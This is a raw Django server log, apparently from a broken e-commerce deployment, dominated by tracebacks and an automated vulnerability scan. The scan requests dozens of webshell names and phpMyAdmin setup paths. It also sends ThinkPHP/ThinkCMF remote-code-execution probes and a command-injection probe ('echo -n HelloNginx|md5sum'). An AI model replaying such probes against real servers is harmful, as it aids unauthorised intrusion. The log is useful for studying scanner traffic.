**callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [29/Nov/2019 10:20:16] "GET /webdav/ HTTP/1.0" 500 131204 Not Found: /java.php [29/Nov/2019 10:20:22] "GET /java.php HTTP/1.0" 404 6399 Not Found: /_query.php [29/Nov/2019 10:20:23] "GET /_query.php HTTP/1.0" 404 6405 Not Found: /db_cts.php [29/Nov/2019 10:20:26] "GET /db_cts.php HTTP/1.0" 404 6405 Not Found: /db_pma.php [29/Nov/2019 10:20:26] "GET /db_pma.php HTTP/1.0" 404 6405 Not Found: /help-e.php [29/Nov/2019 10:20:30] "GET /help-e.php HTTP/1.0" 404 6405 Not Found: /license.php [29/Nov/2019 10:20:31] "GET /license.php HTTP/1.0" 404 6408 Not Found: /log.php [29/Nov/2019 10:20:31] "GET /log.php HTTP/1.0" 404 6396 Not Found: /hell.php [29/Nov/2019 10:20:32] "GET /hell.php HTTP/1.0" 404 6399 Not Found: /x.php [29/Nov/2019 10:20:34] "GET /x.php HTTP/1.0" 404 6390 Not Found: /shell.php [29/Nov/2019 10:20:34] "GET /shell.php HTTP/1.0" 404 6402 Not Found: /htdocs.php [29/Nov/2019 10:20:35] "GET /htdocs.php HTTP/1.0" 404 6405 Not Found: /b.php [29/Nov/2019 10:20:36] "GET /b.php HTTP/1.0" 404 6390 Not Found: /desktop.ini.php [29/Nov/2019 10:20:38] "GET /desktop.ini.php HTTP/1.0" 404 6420 Not Found: /z.php [29/Nov/2019 10:20:39] "GET /z.php HTTP/1.0" 404 6390 Not Found: /lala.php [29/Nov/2019 10:20:39] "GET /lala.php HTTP/1.0" 404 6399 Not Found: /lala-dpr.php [29/Nov/2019 10:20:40] "GET /lala-dpr.php HTTP/1.0" 404 6411 Not Found: /wpc.php [29/Nov/2019 10:20:40] "GET /wpc.php HTTP/1.0" 404 6396 Not Found: /wpo.php [29/Nov/2019 10:20:41] "GET /wpo.php HTTP/1.0" 404 6396 Not Found: /t6nv.php [29/Nov/2019 10:20:42] "GET /t6nv.php HTTP/1.0" 404 6399 Not Found: /muhstik.php [29/Nov/2019 10:20:43] "GET /muhstik.php HTTP/1.0" 404 6408 Not Found: /text.php [29/Nov/2019 10:20:43] "GET /text.php HTTP/1.0" 404 6399 Not Found: /wp-config.php [29/Nov/2019 10:20:44] "GET /wp-config.php HTTP/1.0" 404 6414 Not Found: /muhstik.php [29/Nov/2019 10:20:44] "GET /muhstik.php HTTP/1.0" 404 6408 Not Found: /muhstik2.php [29/Nov/2019 10:20:45] "GET /muhstik2.php HTTP/1.0" 404 6411 Not Found: /muhstiks.php [29/Nov/2019 10:20:46] "GET /muhstiks.php HTTP/1.0" 404 6411 Not Found: /muhstik-dpr.php [29/Nov/2019 10:20:47] "GET /muhstik-dpr.php HTTP/1.0" 404 6420 Not Found: /lol.php [29/Nov/2019 10:20:47] "GET /lol.php HTTP/1.0" 404 6396 Not Found: /uploader.php [29/Nov/2019 10:20:48] "GET /uploader.php HTTP/1.0" 404 6411 Not Found: /cmd.php [29/Nov/2019 10:20:48] "GET /cmd.php HTTP/1.0" 404 6396 Not Found: /cmv.php [29/Nov/2019 10:20:49] "GET /cmv.php HTTP/1.0" 404 6396 Not Found: /cmdd.php [29/Nov/2019 10:20:50] "GET /cmdd.php HTTP/1.0" 404 6399 Not Found: /knal.php [29/Nov/2019 10:20:51] "GET /knal.php HTTP/1.0" 404 6399 Not Found: /cmd.php [29/Nov/2019 10:20:51] "GET /cmd.php HTTP/1.0" 404 6396 Not Found: /shell.php [29/Nov/2019 10:20:52] "GET /shell.php HTTP/1.0" 404 6402 Not Found: /appserv.php [29/Nov/2019 10:20:52] "GET /appserv.php HTTP/1.0" 404 6408 Not Found: /scripts/setup.php [29/Nov/2019 10:20:53] "GET /scripts/setup.php HTTP/1.0" 404 6426 Not Found: /phpmyadmin/scripts/setup.php [29/Nov/2019 10:20:53] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6459 Not Found: /phpMyAdmin/scripts/setup.php [29/Nov/2019 10:20:54] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6459 Not Found: /phpmyadmin/scripts/db___.init.php [29/Nov/2019 10:21:02] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.0" 404 6474 Not Found: /phpMyAdmin/scripts/db___.init.php [29/Nov/2019 10:21:03] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.0" 404 6474 Not Found: /pma/scripts/setup.php [29/Nov/2019 10:21:06] "GET /pma/scripts/setup.php HTTP/1.0" 404 6438 Not Found: /PMA/scripts/setup.php [29/Nov/2019 10:21:06] "GET /PMA/scripts/setup.php HTTP/1.0" 404 6438 Not Found: /myadmin/scripts/setup.php [29/Nov/2019 10:21:07] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6450 Not Found: /MyAdmin/scripts/setup.php [29/Nov/2019 10:21:08] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6450 Not Found: /PMA/scripts/db___.init.php [29/Nov/2019 10:21:10] "GET /PMA/scripts/db___.init.php HTTP/1.0" 404 6453 Not Found: /myadmin/scripts/db___.init.php [29/Nov/2019 10:21:11] "GET /myadmin/scripts/db___.init.php HTTP/1.0" 404 6465 Not Found: /MyAdmin/scripts/db___.init.php [29/Nov/2019 10:21:11] "GET /MyAdmin/scripts/db___.init.php HTTP/1.0" 404 6465 Not Found: /plugins/weathermap/editor.php [29/Nov/2019 10:21:12] "GET /plugins/weathermap/editor.php HTTP/1.0" 404 6462 Not Found: /cacti/plugins/weathermap/editor.php [29/Nov/2019 10:21:12] "GET /cacti/plugins/weathermap/editor.php HTTP/1.0" 404 6480 Not Found: /weathermap/editor.php [29/Nov/2019 10:21:13] "GET /weathermap/editor.php HTTP/1.0" 404 6438 Not Found: /index.php [29/Nov/2019 10:21:14] "GET /index.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6649 Not Found: /elrekt.php [29/Nov/2019 10:21:15] "GET /elrekt.php?s=%2f%69%6e%64%65%78%2f%5c%74%68%69%6e%6b%5c%61%70%70%2f%69%6e%76%6f%6b%65%66%75%6e%63%74%69%6f%6e&function=%63%61%6c%6c%5f%75%73%65%72%5f%66%75%6e%63%5f%61%72%72%61%79&vars[0]=%6d%645&vars[1][]=%48%65%6c%6c%6f%54%68%69%6e%6b%50%48%50 HTTP/1.0" 404 6652 DEBUG 2019-11-29 10:21:15,529 utils 26999 140702522537728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App'; args=('App',) DEBUG 2019-11-29 10:21:15,551 utils 26999 140702522537728 (0.000) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-29 10:21:15,552 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 10:21:15,553 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 10:21:15,554 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App' LIMIT 21; args=('App',) DEBUG 2019-11-29 10:21:15,555 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 10:21:15,556 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App' LIMIT 21; args=('App',) DEBUG 2019-11-29 10:21:15,557 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App' LIMIT 21; args=('App',) DEBUG 2019-11-29 10:21:15,558 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'App' LIMIT 21; args=('App',) Internal Server Error: /App/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [29/Nov/2019 10:21:15] "GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.0" 500 131843 Not Found: /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} [29/Nov/2019 10:21:16] "GET /index.php/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6553 Not Found: /index.php [29/Nov/2019 10:21:16] "GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.0" 404 6458 [29/Nov/2019 10:21:17] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.0" 302 0 [29/Nov/2019 10:21:17] "GET / HTTP/1.0" 302 0 DEBUG 2019-11-29 10:21:17,738 utils 26999 140702522537728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla'; args=('joomla',) DEBUG 2019-11-29 10:21:17,778 utils 26999 140702522537728 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."available" = true ORDER BY "shop_product"."name" ASC LIMIT 21; args=(True,) DEBUG 2019-11-29 10:21:17,780 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 10:21:17,781 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 10:21:17,783 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) DEBUG 2019-11-29 10:21:17,784 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" ORDER BY "shop_category"."name" ASC LIMIT 21; args=() DEBUG 2019-11-29 10:21:17,786 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) DEBUG 2019-11-29 10:21:17,787 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) DEBUG 2019-11-29 10:21:17,789 utils 26999 140702522537728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."slug" FROM "shop_category" WHERE "shop_category"."slug" = 'joomla' LIMIT 21; args=('joomla',) Internal Server Error: /joomla/ Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) psycopg2.errors.UndefinedTable: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ The above exception was the direct cause of the following exception: Traceback (most recent call last): File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/exception.py", line 34, in inner response = get_response(request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 115, in _get_response response = self.process_exception_by_middleware(e, request) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/core/handlers/base.py", line 113, in _get_response response = wrapped_callback(request, *callback_args, **callback_kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/shop/views.py", line 12, in product_list category = get_object_or_404(Category, slug=category_slug) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/shortcuts.py", line 93, in get_object_or_404 return queryset.get(*args, **kwargs) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 402, in get num = len(clone) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 256, in __len__ self._fetch_all() File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 1242, in _fetch_all self._result_cache = list(self._iterable_class(self)) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/query.py", line 55, in __iter__ results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1100, in execute_sql cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 99, in execute return super().execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 67, in execute return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 76, in _execute_with_wrappers return executor(sql, params, many, context) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/utils.py", line 89, in __exit__ raise dj_exc_value.with_traceback(traceback) from exc_value File "/home/resfx/public_html/admin.resfx.com/backend/venv_name/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute return self.cursor.execute(sql, params) django.db.utils.ProgrammingError: relation "shop_category" does not exist LINE 1: ...hop_category"."name", "shop_category"."slug" FROM "shop_cate... ^ [29/Nov/2019 10:21:17] "GET /joomla/ HTTP/1.0" 500 131390 [29/Nov/2019 10:21:22] "GET /?a=echo%20-n%20HelloNginx%7Cmd5sum HTTP/1.0" 302 0 Not Found: /d7.php [29/Nov/2019 10:21:22] "GET /d7.php HTTP/1.0" 404 6393 Not Found: /rxr.php [29/Nov/2019 10:21:23] "GET /rxr.php HTTP/1.0" 404 6396 [29/Nov/2019 10:21:23] "GET / HTTP/1.0" 302 0 Not Found: /1x.php [29/Nov/2019 10:21:26] "GET /1x.php HTTP/1.0" 404 6393 Not Found: /home.php [29/Nov/2019 10:21:26] "GET /home.php HTTP/1.0" 404 6399 Not Found: /undx.php [29/Nov/2019 10:21:27] "GET /undx.php HTTP/1.0" 404 6399 Not Found: /spider.php [29/Nov/2019 10:21:28] "GET /spider.php HTTP/1.0" 404 6405 Not Found: /composers.php [29/Nov/2019 10:21:30] "GET /composers.php HTTP/1.0" 404 6414 Not Found: /izom.php [29/Nov/2019 10:21:30] "GET /izom.php HTTP/1.0" 404 6399 Not Found: /composer.php [29/Nov/2019 10:21:31] "GET /composer.php HTTP/1.0" 404 6411 Not Found: /hue2.php [29/Nov/2019 10:21:32] "GET /hue2.php HTTP/1.0" 404 6399 Not Found: /lang.php [29/Nov/2019 10:21:34] "GET /lang.php?f=1 HTTP/1.0" 404 6403 Not Found: /izom.php [29/Nov/2019 10:21:35] "GET /izom.php HTTP/1.0" 404 6399 Not Found: /payload.php [29/Nov/2019 10:21:35] "GET /payload.php HTTP/1.0" 404 6408 Not Found: /new_license.php [29/Nov/2019 10:21:36] "GET /new_license.php HTTP/1.0" 404 6420 Not Found: /images/!.php [29/Nov/2019 10:21:38] "GET /images/!.php HTTP/1.0" 404 6411 Not Found: /images/vuln.php [29/Nov/2019 10:21:38] "GET /images/vuln.php HTTP/1.0" 404 6420 Not Found: /hd.php [29/Nov/2019 10:21:39] "GET /hd.php HTTP/1.0" 404 6393 Not Found: /images/up.php [29/Nov/2019 10:21:40] "GET /images/up.php HTTP/1.0" 404 6414 Not Found: /images/attari.php [29/Nov/2019 10:21:40] "GET /images/attari.php HTTP/1.0" 404 6426 Not Found: /images/jsspwneed.php [29/Nov/2019 10:21:41] "GET /images/jsspwneed.php HTTP/1.0" 404 6435 Not Found: /images/stories/cmd.php [29/Nov/2019 10:21:42] "GET /images/stories/cmd.php HTTP/1.0" 404 6441 Not Found: /images/stories/filemga.php [29/Nov/2019 10:21:42] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.0" 404 6464 Not Found: /up.php [29/Nov/2019 10:21:43] "GET /up.php HTTP/1.0" 404 6393 Not Found: /laravel.php [29/Nov/2019 10:21:44] "GET /laravel.php HTTP/1.0" 404 6408 Not Found: /huoshan.php [29/Nov/2019 10:21:44] "GET /huoshan.php HTTP/1.0" 404 6408 Not Found: /yu.php [29/Nov/2019 10:21:45] "GET /yu.php HTTP/1.0" 404 6393 Not Found: /ftmabc.php [29/Nov/2019 10:21:46] "GET /ftmabc.php HTTP/1.0" 404 6405 Not Found: /doudou.php [29/Nov/2019 10:21:46] "GET /doudou.php HTTP/1.0" 404 6405 Not Found: /mjx.php [29/Nov/2019 10:21:47] "GET /mjx.php HTTP/1.0" 404 6396 Not Found: /xiaoxia.php [29/Nov/2019 10:21:48] "GET /xiaoxia.php HTTP/1.0" 404 6408 Not Found: /yuyang.php [29/Nov/2019 10:21:48] "GET /yuyang.php HTTP/1.0" 404 6405 Not Found: /zz.php [29/Nov/2019 10:21:49] "GET /zz.php HTTP/1.0" 404 6393 Not Found: /ak.php [29/Nov/2019 10:21:50] "GET /ak.php HTTP/1.0" 404 6393 Not Found: /baidoubi.php [29/Nov/2019 10:21:51] "GET /baidoubi.php HTTP/1.0" 404 6411 Not Found: /hhhhhh.php [29/Nov/2019 10:21:51] "GET /hhhhhh.php HTTP/1.0" 404 6405 Not Found: /meijianxue.php [29/Nov/2019 10:21:52] "GET /meijianxue.php HTTP/1.0" 404 6417 Not Found: /no1.php [29/Nov/2019 10:21:52] "GET /no1.php HTTP/1.0" 404 6396 Not Found: /python.php [29/Nov/2019 10:21:53] "GET /python.php HTTP/1.0" 404 6405 Not Found: /woshimengmei.php [29/Nov/2019 10:21:53] "GET /woshimengmei.php HTTP/1.0" 404 6423 Not Found: /taisui.php [29/Nov/2019 10:21:58] "GET /taisui.php HTTP/1.0" 404 6405 Not Found: /xiaxia.php [29/Nov/2019 10:21:59] "GET /xiaxia.php HTTP/1.0" 404 6405 Not Found: /xsser.php [29/Nov/2019 10:22:02] "GET /xsser.php HTTP/1.0" 404 6402 Not Found: /zzz.php [29/Nov/2019 10:22:02] "GET /zzz.php HTTP/1.0" 404 6396 Not Found: /dp.php [29/Nov/2019 10:22:06] "GET /dp.php HTTP/1.0" 404 6393 Not Found: /hs.php [29/Nov/2019 10:22:07] "GET /hs.php HTTP/1.0" 404 6393 Not Found: /haiyan.php [29/Nov/2019 10:22:10] "GET /haiyan.php HTTP/1.0" 404 6405 Not Found: /phpdm.php [29/Nov/2019 10:22:10] "GET /phpdm.php HTTP/1.0" 404 6402 Not Found: /root.php [29/Nov/2019 10:22:11] "GET /root.php HTTP/1.0" 404 6399 Not Found: /5678.php [29/Nov/2019 10:22:12] "GET /5678.php HTTP/1.0" 404 6399 Not Found: /xiu.php [29/Nov/2019 10:22:14] "GET /xiu.php HTTP/1.0" 404 6396 Not Found: /wuwu11.php [29/Nov/2019 10:22:14] "POST /wuwu11.php HTTP/1.0" 404 6406 Not Found: /xw.php [29/Nov/2019 10:22:15] "POST /xw.php HTTP/1.0" 404 6394 Not Found: /xw1.php [29/Nov/2019 10:22:16] "POST /xw1.php HTTP/1.0" 404 6397 Not Found: /9678.php [29/Nov/2019 10:22:16] "POST /9678.php HTTP/1.0" 404 6400 Not Found: /wc.php [29/Nov/2019 10:22:17] "POST /wc.php HTTP/1.0" 404 6394 Not Found: /xx.php [29/Nov/2019 10:22:18] "POST /xx.php HTTP/1.0" 404 6394 Not Found: /s.php [29/Nov/2019 10:22:19] "POST /s.php HTTP/1.0" 404 6391 Not Found: /w.php [29/Nov/2019 10:22:19] "POST /w.php HTTP/1.0" 404 6391 Not Found: /sheep.php [29/Nov/2019 10:22:20] "POST /sheep.php HTTP/1.0" 404 6403 Not Found: /qaq.php [29/Nov/2019 10:22:20] "POST /qaq.php HTTP/1.0" 404 6397 Not Found: /qq.php [29/Nov/2019 10:22:22] "POST /qq.php HTTP/1.0" 404 6394 Not Found: /aaa.php [29/Nov/2019 10:22:23] "POST /aaa.php HTTP/1.0" 404 6397 Not Found: /hhh.php [29/Nov/2019 10:22:23] "POST /hhh.php HTTP/1.0" 404 6397 Not Found: /jjj.php [29/Nov/2019 10:22:24] "POST /jjj.php HTTP/1.0" 404 6397 Not Found: /vvv.php [29/Nov/2019 10:22:24] "POST /vvv.php HTTP/1.0" 404 6397 Not Found: /www.php [29/Nov/2019 10:22:25] "POST /www.php HTTP/1.0" 404 6397 Not Found: /ffr.php [29/Nov/2019 10:22:25] "POST /ffr.php HTTP/1.0" 404 6397 Not Found: /415.php [29/Nov/2019 10:22:30] "POST /415.php HTTP/1.0" 404 6397 Not Found: /421.php [29/Nov/2019 10:22:31] "POST /421.php HTTP/1.0" 404 6397 Not Found: /a411.php [29/Nov/2019 10:22:34] "POST /a411.php HTTP/1.0" 404 6400 Not Found: /whoami.php [29/Nov/2019 10:22:35] "POST /whoami.php HTTP/1.0" 404 6406 Not Found: /9.php [29/Nov/2019 10:22:38] "POST /9.php HTTP/1.0" 404 6391 Not Found: /98k.php [29/Nov/2019 10:22:39] "POST /98k.php HTTP/1.0" 404 6397 Not Found: /981.php [29/Nov/2019 10:22:39] "POST /981.php HTTP/1.0" 404 6397 Not Found: /887.php [29/Nov/2019 10:22:40] "POST /887.php HTTP/1.0" 404 6397 Not Found: /aa.php [29/Nov/2019 10:22:42] "POST /aa.php HTTP/1.0" 404 6394 Not Found: /bb.php [29/Nov/2019 10:22:42] "POST /bb.php HTTP/1.0" 404 6394 Not Found: /pp.php [29/Nov/2019 10:22:43] "POST /pp.php HTTP/1.0" 404 6394 Not Found: /tt.php [29/Nov/2019 10:22:44] "POST /tt.php HTTP/1.0" 404 6394 Not Found: /jj1.php [29/Nov/2019 10:22:47] "POST /jj1.php HTTP/1.0" 404 6397 Not Found: /jbb.php [29/Nov/2019 10:22:47] "POST /jbb.php HTTP/1.0" 404 6397 Not Found: /7o.php [29/Nov/2019 10:22:48] "POST /7o.php HTTP/1.0" 404 6394 Not Found: /qwq.php [29/Nov/2019 10:22:48] "POST /qwq.php HTTP/1.0" 404 6397 Not Found: /nb.php [29/Nov/2019 10:22:49] "POST /nb.php HTTP/1.0" 404 6394 Not Found: /kpl.php [29/Nov/2019 10:22:50] "POST /kpl.php HTTP/1.0" 404 6397 Not Found: /hgx.php [29/Nov/2019 10:22:51] "POST /hgx.php HTTP/1.0" 404 6397 Not Found: /ppl.php [29/Nov/2019 10:22:51] "POST /ppl.php HTTP/1.0" 404 6397 Not Found: /tty.php [29/Nov/2019 10:22:52] "POST /tty.php HTTP/1.0" 404 6397 Not Found: /ooi.php [29/Nov/2019 10:22:52] "POST /ooi.php HTTP/1.0" 404 6397 Not Found: /aap.php [29/Nov/2019 10:22:53] "POST /aap.php HTTP/1.0" 404 6397 Not Found: /app.php [29/Nov/2019 10:22:54] "POST /app.php HTTP/1.0" 404 6397 Not Found: /bbr.php [29/Nov/2019 10:22:54] "POST /bbr.php HTTP/1.0" 404 6397 Not Found: /ioi.php [29/Nov/2019 10:22:55] "POST /ioi.php HTTP/1.0" 404 6397 Not Found: /uuu.php [29/Nov/2019 10:22:56] "POST /uuu.php HTTP/1.0" 404 6397 Not Found: /yyy.php [29/Nov/2019 10:22:56] "POST 